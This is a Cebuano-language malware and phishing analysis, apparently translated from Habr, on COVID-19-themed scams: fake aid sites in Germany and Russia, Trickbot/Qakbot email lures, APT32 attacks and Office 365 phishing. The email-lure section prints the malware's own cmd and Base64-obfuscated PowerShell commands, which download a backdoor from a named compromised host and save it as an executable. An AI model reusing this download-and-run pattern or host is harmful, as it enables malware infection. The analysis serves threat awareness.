Ang mga tig-atake nagpadayon sa pagpahimulos sa hilisgutan sa COVID-19, nga nagmugna ug dugang nga mga hulga alang sa mga tiggamit nga interesado kaayo sa tanan nga may kalabotan sa epidemya. SA Nahisgotan na namo kung unsang mga matang sa malware ang mitungha pagkahuman sa coronavirus, ug karon maghisgot kami bahin sa mga pamaagi sa social engineering nga nasugatan na sa mga tiggamit sa lainlaing mga nasud, lakip ang Russia. Kinatibuk-ang mga uso ug mga panig-ingnan ubos sa pagputol.
Hinumdomi sa Gihisgutan namon ang kamatuoran nga ang mga tawo andam nga magbasa dili lamang bahin sa coronavirus ug sa dagan sa epidemya, apan bahin usab sa mga lakang sa suporta sa pinansyal? Ania ang usa ka maayong panig-ingnan. Usa ka makapaikag nga pag-atake sa phishing ang nadiskobrehan sa estado sa Alemanya sa North Rhine-Westphalia o NRW. Ang mga tig-atake naghimo og mga kopya sa website sa Ministry of Economy (), diin ang bisan kinsa mahimong mag-aplay alang sa pinansyal nga tabang. Ang ingon nga programa tinuod nga naglungtad, ug kini nahimo nga mapuslanon alang sa mga scammers. Pagkadawat sa personal nga datos sa ilang mga biktima, naghimo sila og aplikasyon sa tinuod nga website sa ministeryo, apan nagpakita sa ubang mga detalye sa bangko. Sumala sa opisyal nga datos, 4 ka libo nga mga peke nga mga hangyo ang gihimo hangtod nadiskubre ang laraw. Ingon usa ka sangputanan, ang $109 milyon alang sa mga apektadong lungsuranon nahulog sa mga kamot sa mga mangingilad.
Gusto ba nimo ang usa ka libre nga pagsulay alang sa COVID-19?
Laing hinungdanon nga pananglitan sa phishing nga adunay tema nga coronavirus mao ang sa mga email. Ang mga mensahe nakadani sa atensyon sa mga tiggamit nga adunay usa ka tanyag nga moagi sa libre nga pagsulay alang sa impeksyon sa coronavirus. Sa pagkadugtong niini adunay mga higayon sa Trickbot/Qakbot/Qbot. Ug sa dihang kadtong gustong mosusi sa ilang panglawas nagsugod sa βpagpuno sa gilakip nga porma,β usa ka malisyoso nga script ang gi-download sa kompyuter. Ug aron malikayan ang pagsulay sa sandboxing, ang script nagsugod sa pag-download sa panguna nga virus pagkahuman sa pila ka oras, kung ang mga sistema sa pagpanalipod kombinsido nga walaβy makadaot nga kalihokan nga mahitabo.
Ang pagkumbinser sa kadaghanan sa mga tiggamit aron mahimo ang mga macros dali ra usab. Aron mahimo kini, usa ka sumbanan nga limbong ang gigamit: aron pun-on ang mga pangutana, kinahanglan nimo una nga palihokon ang mga macro, nga nagpasabut nga kinahanglan nimo nga magpadagan sa usa ka script sa VBA.
Sama sa imong nakita, ang VBA script espesyal nga gitagoan gikan sa mga antivirus.
Ang Windows adunay feature sa paghulat diin ang aplikasyon maghulat /T <segundo> sa dili pa dawaton ang default nga "Oo" nga tubag. Sa among kaso, ang script naghulat 65 segundos sa wala pa tangtangon ang temporaryo nga mga file:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Ug samtang naghulat, na-download ang malware. Usa ka espesyal nga PowerShell script ang gilusad alang niini:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Pagkahuman sa pag-decode sa Base64 nga kantidad, ang PowerShell script nag-download sa backdoor nga nahimutang sa kaniadto gi-hack nga web server gikan sa Germany:
http://automatischer-staubsauger.com/feature/777777.pngug gitipigan kini ubos sa ngalan:
C:UsersPublictmpdirfile1.exe
suksukanan sa papel βC:UsersPublictmpdirβ mapapas sa diha nga nagpadagan sa 'tmps1.bat' nga payl nga naglangkob sa sugo cmd /c mkdir ""C:UsersPublictmpdir"".
Gipunting nga pag-atake sa mga ahensya sa gobyerno
Dugang pa, ang mga analista sa FireEye bag-o lang nagreport sa usa ka gipunting nga pag-atake sa APT32 nga gitumong sa mga istruktura sa gobyerno sa Wuhan, ingon man ang Chinese Ministry of Emergency Management. Usa sa mga gipang-apod-apod nga RTF adunay usa ka link sa usa ka artikulo sa New York Times nga nag-ulohan . Bisan pa, sa pagbasa niini, na-download ang malware (giila sa mga analista sa FireEye ang pananglitan nga METALJACK).
Makapainteres, sa panahon sa pagkakita, walay bisan usa sa mga antivirus nga nakamatikod niini nga higayon, sumala sa Virustotal.
Kung ang mga opisyal nga website wala na
Ang labing katingad-an nga pananglitan sa usa ka pag-atake sa phishing nahitabo sa Russia kaniadtong miaging adlaw. Ang rason niini mao ang pagtudlo sa dugay nang gipaabot nga benepisyo sa mga bata nga nag-edad og 3 ngadto sa 16 anyos. Kung gipahibalo ang pagsugod sa pagdawat sa mga aplikasyon kaniadtong Mayo 12, 2020, milyon-milyon ang nagdali sa website sa State Services alang sa dugay na nga gipaabut nga tabang ug gipaubos ang portal nga dili labi ka daotan kaysa usa ka propesyonal nga pag-atake sa DDoS. Sa diha nga ang presidente miingon nga "Ang mga Serbisyo sa Gobyerno dili makasagubang sa dagan sa mga aplikasyon," ang mga tawo nagsugod sa paghisgot online mahitungod sa paglunsad sa usa ka alternatibo nga site alang sa pagdawat sa mga aplikasyon.
Ang problema mao nga daghang mga site nagsugod sa pagtrabaho sa usa ka higayon, ug samtang ang usa, ang tinuod sa posobie16.gosuslugi.ru, sa tinuud nagdawat mga aplikasyon, labi pa .
Ang mga kauban sa SearchInform nakakaplag ug mga 30 ka bag-ong malimbungon nga domain sa .ru zone. Ang Infosecurity ug Softline Company nagsubay sa kapin sa 70 ka susamang peke nga mga website sa serbisyo sa gobyerno sukad sa sinugdanan sa Abril. Ang ilang mga tiglalang nagmaniobra sa pamilyar nga mga simbolo ug naggamit usab sa mga kombinasyon sa mga pulong nga gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, ug uban pa.
Hype ug social engineering
Ang tanan nga kini nga mga pananglitan nagpamatuod lamang nga ang mga tig-atake malampuson nga nag-monetize sa hilisgutan sa coronavirus. Ug kon mas taas ang sosyal nga tensiyon ug mas dili klaro nga mga isyu, mas daghang kahigayonan ang mga scammers nga mangawat ug importanteng datos, pugson ang mga tawo sa pagtugyan sa ilang kuwarta sa ilang kaugalingon, o pag-hack lang sa daghang kompyuter.
Ug gihatagan nga ang pandemya nagpugos sa mga potensyal nga dili andam nga mga tawo nga magtrabaho gikan sa balay nga kadaghanan, dili lamang personal, apan ang datos sa korporasyon naa sa peligro. Pananglitan, bag-o lang ang Microsoft 365 (kanhi Office 365) nga mga tiggamit gipailalom usab sa pag-atake sa phishing. Nakadawat ang mga tawo og daghang "nawala" nga mga mensahe sa tingog ingon mga kadugtong sa mga sulat. Bisan pa, ang mga file sa tinuud usa ka panid sa HTML nga nagpadala sa mga biktima sa pag-atake . Ingon usa ka sangputanan, pagkawala sa pag-access ug pagkompromiso sa tanan nga datos gikan sa account.
Source: www.habr.com